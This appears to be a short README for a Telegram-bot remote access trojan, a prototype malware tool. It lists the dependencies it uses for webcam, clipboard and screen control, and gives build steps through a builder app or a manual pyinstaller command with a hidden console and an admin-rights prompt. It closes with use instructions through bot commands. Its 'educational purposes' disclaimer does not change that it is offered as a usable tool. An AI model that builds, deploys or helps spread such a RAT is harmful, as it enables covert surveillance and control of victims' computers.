Simple Telegram BOT RAT This rat is still prototype no obfuscation, no stealth, no av bypass, no persistance, just a simple rat educational purposes I will not be responsible for damage caused by my script
how to build the rat: install python install opencv-python-headless, pyperclip, pyautogui, python-telegrambot, module, use: pip install python-telegram-bot opencv-python-headless pyautogui pyperclip to install the module after installing the module, open the builder app enter your telegram bot token and click build rat! and wait, don't click anything in the window before the the process is completed if its froze too long you can compile it manual with the source code in the file called "bot.py" to compile it manual (without the builder app) use: pyinstaller --onefile --uac-admin --noconsole bot.py
how to use: type /start to your bot to check the connection type /help to see all the command
sorry if my english is bad